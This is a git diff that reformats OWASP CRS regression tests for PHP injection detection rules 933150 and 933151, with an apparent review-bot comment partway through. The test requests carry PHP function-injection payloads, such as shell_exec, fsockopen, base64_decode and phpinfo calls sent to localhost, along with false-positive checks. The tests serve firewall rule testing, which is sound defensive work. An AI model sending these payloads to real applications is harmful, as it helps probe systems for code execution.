diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
index b72c81fc4..658a0fa21 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml
@@ -2,572 +2,536 @@ meta: author: "lifeforms, azurit" description: None - enabled: true - name: 933150.yaml tests: - - test_title: 933150-1 + - test_id: 1 desc: phpinfo stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/phpinfo" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/phpinfo" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 2 desc: base64_decode stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/base64_decode" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/base64_decode" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 3 desc: base64_decode mixed case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?base64_deCOde" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-4 + - input: + 
dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?base64_deCOde" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 4 desc: bzdecompress stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=bzdecomprEss" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=bzdecomprEss" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 5 desc: call_user_func stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOcall_user_func" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOcall_user_func" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 6 desc: fsockopen stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOfsockopen" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOfsockopen" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 7 desc: gzdecode stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOgzdecode" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOgzdecode" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 8 desc: GzInFlAtE stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOGzInFlAtE" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOGzInFlAtE" + version: "HTTP/1.1" + output: + 
log_contains: id "933150" + - test_id: 9 desc: pHpInFo mixed case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOpHpInFo" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=FOOpHpInFo" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 10 desc: gzuncompress stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?I%20don%27t%20like%20gzuncompress" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?I%20don%27t%20like%20gzuncompress" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 11 desc: fsockopen stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/get?bar=pfsockopen%28%27foo%27%2C%2025%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/get?bar=pfsockopen%28%27foo%27%2C%2025%29" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 12 desc: posix_getpwuiD stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?bar=posix_getpwuiD%28%27foo%27%2C%2025%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?bar=posix_getpwuiD%28%27foo%27%2C%2025%29" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 13 desc: shell_exec stages: - - stage: - input: - data: Shell%5fexec=bla - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-14 + - input: + data: Shell%5fexec=bla + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 14 desc: ZlIb_DeCoDe stages: - - stage: - input: - data: ZlIb%5fDeCoDe=bla - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-15 + - input: + data: ZlIb%5fDeCoDe=bla + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 15 desc: get_defined_functions stages: - - stage: - input: - data: foo=get_defined_functions%28%29%5B0%5D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-16 + - input: + data: foo=get_defined_functions%28%29%5B0%5D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 16 desc: get_defined_vars stages: - - stage: - input: - data: foo=get_defined_vars%28%29%5B0%5D - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-17 + - input: + data: foo=get_defined_vars%28%29%5B0%5D + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 17 desc: | PHP function call in body, mixed case. payload: curl_iNit() stages: - - stage: - input: - data: foo=curl_iNit%28%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-18 + - input: + data: foo=curl_iNit%28%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 18 desc: | PHP function call in body payload: posix_getegid() stages: - - stage: - input: - data: posix_getegid%28%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-19 + - input: + data: posix_getegid%28%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 19 desc: | PHP function call in body, mixed case payload: Print_r() stages: - - stage: - input: - data: x=Print_r%28%20%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/print_r" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-20 + - input: + data: x=Print_r%28%20%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/print_r" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 20 desc: | PHP function call in body. payload: strrev() stages: - - stage: - input: - data: x=strrev%28%20%29 - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/strrev" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-21 + - input: + data: x=strrev%28%20%29 + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/strrev" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 21 desc: | False Positive test payload: the files (yep) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=the%20files%20%28yep%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=the%20files%20%28yep%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 22 desc: | False Positive test, exec should be followed by parenthesis payload: exec ( stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=exec%20%28" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=exec%20%28" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 23 desc: | False Positive test payload: executor() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=executor%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=executor%28%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 24 desc: | False Positive test payload: cheval($foo) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=cheval%28%24foo%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=cheval%28%24foo%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 25 desc: | False Positive test payload: audiofile($foo) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=audi%6ffile%28%24foo%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=audi%6ffile%28%24foo%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 26 desc: | False Positive test payload: the system is down() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=the%20system%20is%20down%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=the%20system%20is%20down%28%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 27 desc: | False Positive test payload: ecosystem() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ecosystem%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=ecosystem%28%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 28 desc: | False Positive test, function doesn't exist payload: systems() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=systems%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=systems%28%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 29 desc: | False Positive test, function doesn't exist payload: system something() stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS 
test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=system%20something%28%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - - test_title: 933150-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=system%20something%28%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 30 desc: "Snippets of English words (like `prev`) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?a=preview" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?a=preview" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 31 desc: "Snippets of English words (like `exp`) should not be matched, requiring regex match with word boundaries (e.g. 
933160)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post?a=exploration" - version: "HTTP/1.1" - output: - no_log_contains: id "933150" - - test_title: 933150-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post?a=exploration" + version: "HTTP/1.1" + output: + no_log_contains: id "933150" + - test_id: 32 desc: | PHP mixed case function call with space, LF between (). payload: file_ExistS (\n\n) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=file_ExistS%20%28%0A%0A%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" - - test_title: 933150-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=file_ExistS%20%28%0A%0A%29" + version: "HTTP/1.1" + output: + log_contains: id "933150" + - test_id: 33 desc: | PHP function call with multiple whitespaces. 
payload: fopen (blah) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=fopen%20%20%28blah%29" - version: "HTTP/1.1" - output: - log_contains: id "933150" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?foo=fopen%20%20%28blah%29" + version: "HTTP/1.1" + output: + log_contains: id "933150"
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml
index a7e7303d5..0d582b7e3 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml
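Review bot: Test 11 (`desc: fsockopen`, uri `/get?bar=pfsockopen%28%27foo%27%2C%2025%29`) is the only entry in this file whose new `- input:` block has no `method:` key, so it silently relies on the runner's default method while every sibling spells out `method: GET` or `method: POST`; adding `method: GET` after the `Accept` header makes the request explicit and keeps the file uniform. Its description also duplicates test 6's `fsockopen` even though the payload here is `pfsockopen`, so `desc: pfsockopen` would tell the two apart in test output. Both points sit on lines the commit rewrites into the flattened stage form, so they can be folded into this migration rather than left for a follow-up.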
@@ -2,135 +2,125 @@ meta: author: "lifeforms, ssigwart, azurit" description: None - enabled: true - name: 933151.yaml tests: - - test_title: 933151-1 + - test_id: 1 desc: "pmf + chain" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/array_diff%20%28" - version: "HTTP/1.1" - output: - log_contains: id "933151" - - test_title: 933151-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/array_diff%20%28" + version: "HTTP/1.1" + output: + log_contains: id "933151" + - test_id: 2 desc: "pmf + chain" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?date_ADD%28%29" - version: "HTTP/1.1" - output: - log_contains: id "933151" - - test_title: 933151-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?date_ADD%28%29" + version: "HTTP/1.1" + output: + log_contains: id "933151" + - test_id: 3 desc: "non-dangerous PHP functions, removed to reduce FP" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=filemtime%28%24foo%29" - version: "HTTP/1.1" - 
